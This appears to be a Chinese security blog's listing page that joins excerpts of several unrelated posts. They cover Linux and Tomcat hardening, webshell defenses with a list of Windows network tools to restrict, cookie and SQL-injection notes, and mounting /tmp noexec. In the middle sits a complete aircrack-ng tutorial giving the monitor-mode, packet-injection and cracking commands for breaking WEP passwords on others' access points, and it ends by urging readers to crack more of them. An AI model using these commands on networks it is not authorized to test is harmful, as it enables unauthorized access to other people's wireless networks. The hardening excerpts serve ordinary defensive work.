在Linux系统中，用户帐号是用户的身份符号，它由用户名和用户口令构成。 系统将输入的用户名寄放在/etc/passwd文件中，
而将输入的口令以加密的形式寄放在/etc/shadow文件中。
在正常情况下，这些口令和其他信息由操作系统维护，可以是超级用户(root)进行一些操作。我们做安全加固的时候会对linux中的用户管理部分一般做如下安全加固。敬请参考： 继续阅读 →

一、什么是webshell？

基于b/s架构的软件部署在Internet上，那么安全性是必须要关注的，攻击者可以采用各种方式进行攻击，获取系统的控制权，其中webshell是常见的攻击方式。
Webshell是攻击者在被攻击网站上植入的asp、php、jsp程序文件，攻击者在入侵了一个web系统后，常常在将这些asp、php、jsp木马后门文件放置在web服务器的web目录中，与正常的网站文件混在一起。然后攻击者就可以通过正常的web访问方式，访问其植入asp、php、jsp程序木马后门控制web服务器，包括创建、修改、删除文件，上传下载文件，查看数据库，执行任意程序命令等。
webshell攻击应用于所有基于b/s结构的系统，包括网站、OA（www.chysoft.net）、CRM、ERP等等。

二、Webshell攻击的应该对措施
了解了webshell的基本原理之后，最关键的防止器植入asp、php、jsp等木马程序文件，使用webshell一般不会在系统日志中留下记录，只会在网站的web日志中留下一些数据提交记录，没有经验的管理员是很难看出入侵痕迹的。我们一般可以从以下几方面对安全性进行处理：
1、Web软件开发的安全
A、程序中存在文件上载的漏洞，攻击者利用漏洞上载木马程序文件。
B、防sql注入、防暴库、防COOKIES欺骗、防跨站脚本攻击。
2、服务器的安全和web服务器的安全
A、服务器做好各项安全设置，病毒和木马检测软件的安装（注：webshell的木马程序不能被该类软件检测到），启动防火墙并关闭不需要的端口和服务。
B、提升web服务器的安全设置
C、对以下命令进行权限控制（以windows为例）：
cmd.exe net.exe net1.exe ping.exe netstat.exe ftp.exe tftp.exe telnet.exe
3、ftp文件上载安全
设置好ftp服务器，防止攻击者直接使用ftp上传木马程序文件到web程序的目录中
4、文件系统的存储权限
设置好web程序目录及系统其它目录的权限，相关目录的写权限只赋予给超级用户，部分目录写权限赋予给系统用户。
5、不要使用超级用户运行web服务
对于apache、tomcat等web服务器，安装后要以系统用户或指定权限的用户运行，如果系统中被植入了asp、php、jsp等木马程序文件，以超级用户身份运行，webshell提权后获得超级用户的权限进而控制整个系统和计算机。

ubuntu下轻松破解无线密码

系统ubuntu10.x

网卡：UR054G
一、安装ubuntu和aircrack-ng

1、安装Ubuntu 8.10 （ 现在最新版暂时是 Alpha 6 ）在此感谢3楼的兄弟指正
附下载地址兄弟们根据自己的硬件选择相应的版本：

ubuntu
2、打开终端：Applications->Accessories->Terminal
在终端中输入 sudo gedit /etc/apt/sources.list 删除所有内容，然后把下面的源复制进去，保存，退出

#Chinese Sources “CN99″

deb http://Ubuntu.cn99.com/ubuntu/ intrepid main restricted universe multiverse
deb http://Ubuntu.cn99.com/ubuntu/ intrepid-backports main restricted universe multiverse
deb http://Ubuntu.cn99.com/ubuntu/ intrepid-proposed main restricted universe multiverse
deb http://Ubuntu.cn99.com/ubuntu/ intrepid-security main restricted universe multiverse
deb http://Ubuntu.cn99.com/ubuntu/ intrepid-updates main restricted universe multiverse

#ubuntu’s Main Sources

deb http://archive.ubuntu.com/ubuntu/ intrepid main universe restricted multiverse
deb http://security.ubuntu.com/ubuntu/ intrepid-security universe main multiverse restricted
deb http://archive.ubuntu.com/ubuntu/ intrepid-updates universe main multiverse restricted
deb http://archive.ubuntu.com/ubuntu/ intrepid-proposed universe main multiverse restricted

3、升级ubuntu到最新版本：System->Administration->Update Manager
4、在终端中输入 sudo apt-get install aircrack-ng 安装aircrack-ng

注：如果暂时你的电脑上不了网，步聚2、3也可以不做，只需刻张Ubuntu系统碟，还有在下面下载aircrack-ng就可以了。
aircrack-ng Ubuntu DEB安装包下载：
二、破解过程

1、在终端中输入 sudo airmon-ng start wlan0 启动无线网卡的监控模式（wlan0是无线网卡的端口,可在终端中输入 ifconfig 查看）
2、在终端中输入 sudo airodump-ng mon0 （特别说明：启动监控模式后无线网的端口现在是 mon0 ！！！）看看有哪些采用wep加密的AP在线，然后按 ctrl+c 退出，保留终端
3、另开一个终端，输入 sudo airodump-ng -c 6 –bssid AP’s MAC -w wep mon0 (-c后面跟着的6是要破解的AP工作频道，–bissid后面跟着的AP’s MAC是要欲破解AP的MAC地址，-w后面跟着wep的是抓下来的数据包DATA保存的文件名，具体情况根据步骤2里面的在线AP更改频道和MAC地址，DATA保存的文件名可随便命名）抓包
4、再另开一个终端，输入 sudo aireplay-ng -1 0 -a AP的mac -h 我wifi的mac mon0 与AP建立虚拟连接 （-h后面跟着的My MAC是自己的无线网卡的MAC地址)

 
5、建立虚拟连接成功后，输入 sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP’s MAC -h My MAC mon0 进行注入，现在回头看下步骤3的终端是不是DATA在开始飞涨！
6、收集有5000个以上的DATA之后，另开一个终端，输入 sudo aircrack-ng wep*.cap 进行解密 （如果没算出来的话，继续等，aircrack-ng 会在DATA每增加多5000个之后就自动再运行，直到算出密码为至）
7、破解出密码后在终端中输入 sudo airomon-ng stop mon0 关闭监控模式，不然无线网卡会一直向刚刚的AP进行注入的，用ctrl+c退出或者直接关闭终端都是不行的。

现在可以冲浪去了，或者重复步聚1-7破解其它的AP

最近系统要上线，收到一份系统技术规范，与安全相关的。这里总结一下：

代码相关：

1.sql注入，这个大家估计都知道，用预处理解决.这个问题很简单，但是在编程时只求完成任务，很多地方都没注意，在日后编程中要认真了。

2.cookie,用户登录时将用户名与密码加密后存放在cookie中，虽然加过密但是在firebug之类的工具下用document.cookie还是可以看到密文的，需要设置httponly.在servlet3.0规范中可以设置Cookie对象的httponly属性。对于之前的版本，需要直接response.setHeader来设置cookie,在字符串最后最后加上httponly就行了(由于最后为了简单直接将cookie去掉了，代码丢失),测试中发现使用这种方法只能为一个cookie设置httponly.一般来说用户与密码会分为两个cookie对象，那么用response.setHeader要调用两次，前一次会被后面的调用override，如果只调一次，将username与password都加上去，测试时发现不能成功。

3.flash安全配置，只允许信任网站的请求

4.尽管不使用第三方链接形式的js,iframe防止xss

tomcat相关：

一.tomcat默认的管理界面及doc信息要禁用

1.取消tomcat默认主页，禁止管理及文档页面的访问(解决可直接查看文件列表的目录、URL存在内部IP地址泄露、URL存在电子邮件地址模式、部分的无效链接、系统路径信息泄露）

a)tomcat/conf/server.xml

找到

<Host name=”localhost” appBase=”webapps”

unpackWARs=”true” autoDeploy=”true”

xmlValidation=”false” xmlNamespaceAware=”false”>

在后面添加<Context path=”” docBase=”smartspeed” debug=”0″ reloadable=”true” />,将smartspeed设为tomcat默认主页,可以直接ip:port访问主页

b)删除tomcat/webapps下面的ROOT及tomcat-docs目录

tomcat/webapps/ROOT

tomcat/webapps/tomcat-docs

禁止管理页面与文档页面的使用

2.禁用不安全的HTTP方法(禁用掉PUT/DELETE/HEAD/OPTIONS/TRACE)

在tomcat/conf/web.xml的结束标签</webapp>之前加入

<security-constraint>

<web-resource-collection>

<url-pattern>/*</url-pattern>

<http-method>PUT</http-method>

<http-method>DELETE</http-method>

<http-method>HEAD</http-method>

<http-method>OPTIONS</http-method>

<http-method>TRACE</http-method>

</web-resource-collection>

<auth-constraint></auth-constraint>

</security-constraint>

<login-config>

<auth-method>BASIC</auth-method>

</login-config>

3.将项目中未使用到的链接全部删除(不要小看这个，安全评估过不了的)

什么限制执行权限
Linux的提权rootkit基本都是已编译的执行文件。禁止其在/tmp下的运行可降低黑客入侵的可能性。Perl、PHP脚本属于解释型语言，可通过perl/php命令直接调用，即使脚本存放于/tmp也不受限制。

## 案例：
perl /tmp/hack.pl #可运行
/tmp/back.pl #无法运行

确认是否有独立的/tmp分区
运行”df -h”命令，在”Mount On”一列确认是否有”/tmp”信息。
有则存在独立的/tmp分区。

对存在独立/tmp分区的系统限制权限

### 1. 编辑/etc/fstab文件中的/tmp挂载权限，将”defaults”调整为”rw,nosuid,noexec”。
LABEL=/tmp /tmp ext3 rw,nosuid,noexec 1 2

### 2. 使用mount命令重新加载/tmp分区
mount -oremount loop,rw,nosuid,noexec /tmp

对不存在独立/tmp分区的系统限制权限

## 例：创建一个100兆的/tmp分区并禁止执行权限
cd /dev/
dd if=/dev/zero of=Tmp bs=1024 count=100000
mkfs -t ext3 /dev/Tmp
cd /
cp -aR /tmp /tmp_backup
mount -o loop,noexec,nosuid,rw /dev/Tmp /tmp
cp -aR /tmp_backup/* /tmp/
chmod 0777 /tmp
chmod +t /tmp

禁止/var/tmp下的执行权限

cd /var
mv /var/tmp/* /tmp/
ls -alh /var/tmp # 确认数据已全部迁移至/tmp
rm -fR /var/tmp
ln -s /tmp /var/tmp

这是个漏洞有点和前一段时间nginx FCGI路径传送bug有点类似，但是不一样。时间过去了快1个月，还是提醒下那些还没升级的朋友，抓紧！

继续阅读 →